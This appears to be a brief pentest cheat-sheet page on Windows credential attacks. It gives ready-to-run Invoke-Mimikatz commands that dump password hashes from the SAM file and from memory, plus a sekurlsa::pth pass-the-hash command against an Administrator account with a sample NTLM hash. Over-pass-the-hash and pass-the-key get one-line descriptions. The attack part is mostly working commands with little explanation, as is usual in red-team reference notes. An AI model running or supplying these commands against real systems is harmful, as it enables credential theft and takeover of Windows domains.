githubEdit

Hashes

Dump Hashes

1st way

Dump Hashes from Sam file

Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam""exit"'

2nd way

dump MSV credentials from memory

Invoke-Mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::msv""exit"'

Pass-the-Hash

Uses the NTLM hash directly to authenticate without knowing the real password.

sekurlsa::pth /user:**Administrator** /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:pdc /run:powershell.exe
# replace with target user

Over Pass The Hash

Uses the NTLM hash to request a Kerberos TGT, then uses the TGT to authenticate anywhere in the domain.


Pass-the-Key

Pass-the-Key (PtK) uses Kerberos keys (AES/DES keys from tickets) instead of passwords or NTLM hashes to authenticate to services.

Last updated